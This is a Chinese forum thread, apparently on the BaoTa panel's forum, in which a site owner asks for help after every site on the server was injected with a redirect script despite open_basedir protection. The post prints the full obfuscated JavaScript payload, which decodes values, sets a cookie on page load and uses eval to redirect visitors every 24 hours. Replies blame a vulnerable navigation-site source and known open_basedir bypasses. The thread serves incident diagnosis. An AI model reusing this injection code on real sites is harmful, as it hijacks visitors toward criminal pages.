【已解答】设置了防跨站无效，网站被人植入木马，跳转...

网站被人偷偷植入了下面的木马，偷偷24小时跳转一次到黑产。

(function(){
var _0xa1b2 = "#黑产网屏蔽了#"; //
var _0xc3d4 = "cmVkaXJlY3RlZA=="; //
var _0xd5e6 = "MjQ="; // 24小时
function _0xf7g8(_0x9h0i){ return atob(_0x9h0i); } //
function _0xj1k2(_0xl3m, _0xn4o){
var _0xp5q = new Date();
_0xp5q.setTime(_0xp5q.getTime() + (_0xn4o * 60 * 60 * 1000));
document.cookie = _0xl3m + "=1;expires=" + _0xp5q.toUTCString() + ";path=/";
}
function _0xr6s(_0xt7u){
var _0xv8w = document.cookie.match(new RegExp("(^| )" + _0xt7u + "=([^;]+)"));
return _0xv8w ? _0xv8w[2] : null;
}
window.addEventListener("load", function() {
var _0xurl = _0xf7g8(_0xa1b2);
var _0xcookie = _0xf7g8(_0xc3d4);
var _0xexpire = parseInt(_0xf7g8(_0xd5e6));
if (!_0xr6s(_0xcookie)) {
_0xj1k2(_0xcookie, _0xexpire);
eval("window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e']['\x68\x72\x65\x66'] = _0xurl;");
}
});
})();

复制代码

宝塔面板里设置了open_basedir防止跨站攻击。这样说，webshell如果只修改了一个站，不可能所有站都能修改吧。但是现在所有网站都被修改了。
检查了Linux和SSL登录记录，没有异常登录，FTP也没有异常。难道是宝塔面板的防止跨站攻击设置无效？

魔魔来啦 · 发表于 2025-2-23 19:45:33

我的也一样，哎，，，都没有管的。

邓振华 · 发表于 2025-2-23 21:04:34

本帖最后由邓振华于 2025-2-23 22:04 编辑

黑客通过六零导航源码的漏洞控制了一个网站，后面整个服务器的其他网站都被植入了代码。我点开了每个网站检查，全部都勾选了open_basedir防止跨站攻击。难道是宝塔面板的防止跨站攻击设置无效？

宝塔技术-小强 · 发表于 2025-2-23 21:52:40

防跨站的设置肯定是有效的。
宝塔通过open_basedir 进行设置的防跨站。
但是开启了open_basedir 并不代表百分之百不能跨站。
你可以百度搜索一下。open_basedir 绕过这种基础的配置是存在绕过的

邓振华 · 发表于 2025-2-23 22:14:50

宝塔技术-小强发表于 2025-2-23 21:52
防跨站的设置肯定是有效的。
宝塔通过open_basedir 进行设置的防跨站。
但是开启了open_basedir 并不代表百 ...

有没有其他更好的方法防止跨站攻击？

宝塔技术-小强 · 发表于 2025-2-24 17:25:34